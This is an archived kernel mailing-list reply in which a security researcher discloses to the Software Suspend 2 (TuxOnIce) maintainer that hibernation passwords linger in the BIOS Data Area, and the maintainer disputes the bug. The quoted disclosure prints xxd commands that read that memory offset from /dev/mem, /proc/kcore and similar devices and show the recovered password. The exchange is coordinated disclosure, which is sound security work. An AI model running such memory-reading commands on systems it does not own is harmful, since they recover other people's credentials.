Re: Vulnerability in Software Suspend 2 (all versions)

All of lore.kernel.org
 help / color / mirror / Atom feed

From: Jonathan Brossard <jonathan@iviztechnosolutions.com>
To: Nigel Cunningham <ncunningham@crca.org.au>
Cc: ncunningham@users.sourceforge.net, chabaud@users.sourceforge.net,
	bernardb@users.sourceforge.net, seasons@users.sourceforge.net,
	techteam@ivizindia.com,
	"cer >> \"CERT(R) Coordination Center\"" <cert@cert.org>,
	mhfl@users.sourceforge.net,
	linux-pm <linux-pm@lists.linux-foundation.org>,
	Jonathan Brossard <jonathan@ivizindia.com>
Subject: Re: Vulnerability in Software Suspend 2 (all versions)
Date: Mon, 28 Jul 2008 14:26:08 +0530	[thread overview]
Message-ID: <488D89A8.2050101@iviztechnosolutions.com> (raw)
In-Reply-To: <1217235150.8430.119.camel@nigel-laptop>

Dear Nigel,

 >Why do you think I'm in Switzerland? I'm actually a New Zealander,

>living in Australia.

Nothing against aussies, the project was once uppon a time austed at the federal school
of Lausane, which afaik is in Switzerland...


>Okay. As mentioned in the previous reply, I don't think this is a bug
>with TuxOnIce itself. If a BIOS data area needs clearing during resume,
>I would suggest that something like the ACPI device driver should be
>doing that, because if the memory needs clearing, it should need
>clearing irrespective of whether you've hibernated or not.

Ok. I gave you the exploit. I gave you the explaination. I gave you the fix.
Now, if you don't want to face the truth that you have a problem (why dont
you just test the exploit ?) because you don't know how to use the BIOS API
safely, that's fine : don't fix it, I don't really care.

Between : Can I quote you at my Defcon presentation  ?


Regards,

Jonathan-


Nigel Cunningham wrote:
> Hi.
>
> On Mon, 2008-07-28 at 14:13 +0530, Jonathan Brossard wrote:
>   
>> Hi Nigel,
>>
>> Sorry for assuming (wrongly) that ppl in Switzerland all speak French ;)
>>     
>
> Why do you think I'm in Switzerland? I'm actually a New Zealander,
> living in Australia.
>
>   
>> In a nutshell, I discovered a new class of vulnerabilities that I will fully
>> disclose at the Defcon security conference in August. It happens to
>> affect your software, which I would like to help you fix before I go
>> public. (Note : I have used your patch for quite a time, thanks for
>> the good job ;)
>>
>> The problem lies in a lack of sanitazation of the Bios Data Area
>> after reading the password using BIOS interruptions (you don't
>> have much choice at that early stage regarding the API anyway).
>> Once the password is read, it remains in RAM for ever, and can
>> be retreived by a (somehow) privileged user :
>>
>> root@blackbox:~# xxd -l 32 -s 0x041e  /dev/mem
>> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
>> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
>> root@blackbox:~# xxd -l 32 -s 0x41e /dev/oldmem
>> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
>> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
>> root@blackbox:~# xxd -l 32 -s 0x041e /dev/.static/dev/mem
>> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
>> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
>> root@blackbox:~# xxd -l 32 -s 0x141e  /proc/kcore
>> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
>> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
>> root@blackbox:~# xxd -l 32 -s 0x141e /dev/core
>> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
>> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
>> root@blackbox:~# xxd -l 32 -s 0x141e /dev/.static/dev/core
>> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
>> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
>> root@blackbox:~#
>>
>>
>> The patch was made against the latest vanilla kernel and checked
>> under gentoo 2006 and Ubuntu Gutsy. It *should* work even if you
>> don't have a standard 3Go/1Go user/kernel split. It simply sanitizes
>> the RAM areas in question.
>>
>> Like I mentioned previously, I would appreciate credits. If you chose
>> to credit us for our work, you can quote :
>> Jonathan Brossard, endrazine@gmail.com, jonathan@ivizindia.com
>>
>>
>> Feel free to contact me if you have any additional questions or feedback :)
>>     
>
> Okay. As mentioned in the previous reply, I don't think this is a bug
> with TuxOnIce itself. If a BIOS data area needs clearing during resume,
> I would suggest that something like the ACPI device driver should be
> doing that, because if the memory needs clearing, it should need
> clearing irrespective of whether you've hibernated or not.
>
> Regards,
>
> Nigel
>
>
>   


-- 
    Jonathan Brossard
    Security Research Engineer
    iViZ Techno Solutions Pvt. Ltd.
    Mobile: +91-9748772994

    Kolkata:
    iViZ Technolgy Solutions(P) Ltd
    c/o Erevmax Technologies (P) Ltd
    DLF IT Park,
    Tower-1, 12th Floor
    08 Major Arterial Road
    New Town, Rajarhat
    Kolkata- 700 156

    Kharagpur:
    iViZ Techno Solutions Pvt Ltd,
    School of Information Technology,
    Indian Institute of Technology,
    2nd Floor, Takshashila,
    Kharagpur 721302 West Bengal, India.
    Phone: +91-3222-282300 ext 4324

    Web page: http://www.ivizindia.com

next prev parent reply	other threads:[~2008-07-28  8:56 UTC|newest]

Thread overview: 11+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
     [not found] <488D821D.5060603@iviztechnosolutions.com>
     [not found] ` <488D8449.2010006@iviztechnosolutions.com>
2008-07-28  8:48   ` Vulnerability in Software Suspend 2 (all versions) Nigel Cunningham
2008-07-28  8:50     ` Jonathan Brossard
2008-07-28  8:58       ` Nigel Cunningham
2008-07-28  8:59         ` Jonathan Brossard
2008-08-09 13:49           ` florent.chabaud
2008-08-09 23:53             ` Jonathan Brossard
2008-08-18  7:01             ` Jonathan Brossard
     [not found] ` <1217234068.8430.108.camel@nigel-laptop>
     [not found]   ` <488D86BB.1050500@iviztechnosolutions.com>
2008-07-28  8:52     ` Nigel Cunningham
2008-07-28  8:56       ` Jonathan Brossard [this message]
2008-07-28  9:40         ` Nigel Cunningham
2008-07-28 22:46           ` Rafael J. Wysocki

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=488D89A8.2050101@iviztechnosolutions.com \
    --to=jonathan@iviztechnosolutions.com \
    --cc=bernardb@users.sourceforge.net \
    --cc=cert@cert.org \
    --cc=chabaud@users.sourceforge.net \
    --cc=jonathan@ivizindia.com \
    --cc=linux-pm@lists.linux-foundation.org \
    --cc=mhfl@users.sourceforge.net \
    --cc=ncunningham@crca.org.au \
    --cc=ncunningham@users.sourceforge.net \
    --cc=seasons@users.sourceforge.net \
    --cc=techteam@ivizindia.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.